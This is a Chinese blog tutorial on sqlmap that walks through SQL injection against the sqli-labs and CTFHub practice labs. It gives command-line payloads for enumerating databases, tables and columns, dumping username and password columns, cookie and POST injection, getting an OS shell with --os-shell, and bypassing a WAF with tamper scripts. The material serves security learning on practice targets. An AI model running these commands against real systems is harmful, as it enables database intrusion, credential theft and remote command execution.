sqlmap的简单使用

已于 2022-11-30 18:18:39 修改
阅读量1k 收藏 3
点赞数 1
分类专栏: # 工具的基本使用 文章标签: 数据库 web安全 前端 服务器 php
于 2022-11-30 18:18:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54037445/article/details/128117865
版权

目录

知识点

一般渗透流程

1、判断有无注入,注入点类型

2、存在注入点,读取数据库

3、指定数据库,读取表名 

4、指定表名,获取列名

5、指定列名获取数据

cookie注入

知识点

一般的渗透流程:

sqlmap -u 注入点                        #判断有无注入点

sqlmap -u 注入点 --dbs               #查看爆破数据库(不是某一个数据库,而是所有的数据库名)

sqlmap -u 注入点 -D 库名 --tables        #爆破指定数据库的表名

sqlmap -u 注入点 -D 库名 -T 表名 --columns        #爆破指定表的列名

sqlmap -u 注入点 -D 库名 -T 表名 -C 列名 --dump        #获取指定表的指定列的数据 

其他常见poyload

1、cookie注入:(只有level达到2才会检测cookie) 

sqlmap -u 注入点 --cookie “id=11” --level 2

2、POST登录框注入(-p是指定参数)

先使用burp抓到post包,保存为文件

sqlmap -r 保存的post包文件 -p “username”,"password" 

3、自动判断注入

sqlmap.py -u 登录的地址 --forms

4、--os-shell(反弹一个shell)

sqlmap -u 注入点 --os-shell

5、绕过waf防火墙

sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper 指定脚本

bypass脚本通常为:

(1)、对于MYSQL数据库 4.0, 5.0注入:space2hash.py
(2)、对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入:space2morehash.py

(3)、encodes编码:charencode.py
(4)、base64编码:base64encode.py
(5)、替换空格和关键字:halfversionedmorekeywords.py

一般渗透流程

1、判断有无注入,注入点类型

poyload:sqlmap -u http://192.168.162.135/sqlilab/Less-1/?id=1 

结果如下:

sqlmap扫描发现该注入点存在sql注入,可以利用的有:布尔盲注、报错注入 、时间盲注、联合查询注入。

2、存在注入点,读取数据库

poyload:sqlmap -u http://192.168.162.135/sqlilab/Less-1/?id=1 --dbs

sqlmap扫描结果如下:

读取到所有的数据库,共七个,我们指定查询security数据库;

3、指定数据库,读取表名 

poyload:sqlmap -u http://192.168.162.135/sqlilab/Less-1/?id=1 -D security --tables

 扫描结果如下:

扫描结果之前忘说了,他会扫描出服务器的系统信息、中间件版本、使用的语言、数据库的类型和版本。 

获得security数据库下的所有表名。

4、指定表名,获取列名

poyload:

sqlmap -u http://192.168.162.135/sqlilab/Less-1/?id=1 -D security -T users --columns

扫描结果如下:

 列名有三列:id,password,username;

5、指定列名获取数据

 poyload:

sqlmap -u http://192.168.162.135/sqlilab/Less-1/?id=1 -D security -T users -C password,username --dump

扫描结果如下:

 获取数据。

cookie注入

以CTFHub-Web-sql注入-cookie注入的靶场为例。

poyload:sqlmap -u "http://challenge-e779f9e166a331a7.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2

扫描结果如下:

 存在注入,并且给出注入类型和数据库版本信息;

其他步骤与上述一样;

star-R
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试工具sqlmap基础教程
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
SQLmap简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQL、SQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过命令行进行操作。sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫除sql注入点。下面简单介绍一下sqlmap使用
sqlmap简单使用方法
weixin_30463341的博客
11-09 137
sqlmap使用 注入点 http://1xx.xxx.xxx.xxxx/dvwa/vulnerabilities/sqli/index.php?id=1&Submit=Submit# 通过burp抓包 cookie:security=low; PHPSESSID=dmvbd4ijv2cm949sgtd69mqpd3 经典六步法: 1: -u “xxx” --c...
sqlMap简单使用
weixin_54472394的博客
06-05 570
一、单个、多个 url 查询 1.单个 -u 1.多个 -m feixiang.txt: http.txt: 三 ,http bp日志扫描 使用bp抓包 保持访问过的 http头部文件 -l :log http log 的意思 –level 5 : cookie 等http头部文件查询
sqlmap简单使用
ch15851302205的专栏
08-07 296
http://www.cnblogs.com/coder2012/p/3939703.html 官方链接: https://github.com/sqlmapproject/sqlmap/wiki/Features Refer: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SQLMAP简易使用教程
nzw1134864657的博客
10-07 9218
SQLMap 一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL 注入漏洞,内置了很多绕过插件 1.1 SQLMap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同
安装python及sqlmap简单使用
weixin_44722125的博客
04-16 1863
打开安装包 安装步骤很简单 安装好了之后配置环境变量 打开sqlmap文件夹 继续打开sqlmapproject-sqlmap-3275d9c文件夹 在空白处 按住shift 右键 选择在此处打开 Powershell窗口 打开之后 输入python sqlmap.py -u 每次运行前面都要加上 python 测试是否存在漏洞 随便输入一个名称 复制地址 到sqlmap里面去 开...
sqlmap 使用教程
wangrui813的博客
01-12 1551
检查注入点: sqlmap -u http://aa.com/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs 爆当前数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db 指定库名列出所有表 sqlmap -u http://aa.com/star_photo.ph
SQLMap简单使用
Amire0x的小乐园
05-06 155
SQLMap 自动检测和利用SQL注入漏洞 环境python2.7左右 命令区分大小写 特点 支持MySQL,Oracle,PostgreSQL,Microsoft SQL Sever,Microsoft Access,IBMDB2,SQLite,Firebird,Sybase,SAPMaxDB. 注入类型:盲注,UNION注入,显错式注入,时间盲注,盲推理注入和堆查询注入等 支持枚举用户,...
SQLmap简单使用
一个普普通通的博客
03-02 1012
sqlmap基本使用
sqlmap简明使用教程
yanzhaogogo的博客
12-04 489
sqlmap简明使用教程
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
2024年HarmonyOS鸿蒙最全使用Typora添加数学公式_typora插入公式(3),HarmonyOS鸿蒙开发需要学什么
最新发布
2401_84851624的博客
05-14 945
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!xdx\int_{1}^{2}{x}dx∫12​xdx | \int_{1}^{2}{x}dx |极限lim⁡ab\lim{a+b}lima+b | \lim{a+
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 2682
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
sqlmap使用教程
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: 1. 安装sqlmap:你可以从sqlmap的官方网站(https://github.com/sqlmapproject/sqlmap)上下载最新版本的sqlmap。解压文件后,进入到sqlmap的目录。 2. 目标URL:确定你要测试的目标URL。这通常是一个包含参数的网页地址,它可能容易受到SQL注入攻击。 3. 检测漏洞:输入以下命令来检测目标URL是否存在SQL注入漏洞: ``` python sqlmap.py -u 目标URL ``` 4. 扫描选项:根据需要选择不同的扫描选项。例如,可以使用`--dbs`选项来获取目标数据库的名称,使用`--tables -D <数据库名>`选项来获取数据库中表的名称等等。 5. 数据库信息:使用`--current-db`选项来获取当前数据库的名称。使用`--users -D <数据库名>`选项来获取数据库中用户的信息。 6. 提取数据:使用`--dump -D <数据库名> -T <表名>`选项来提取指定数据库和表中的数据。你还可以使用其他选项来指定提取的列和过滤条件。 这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值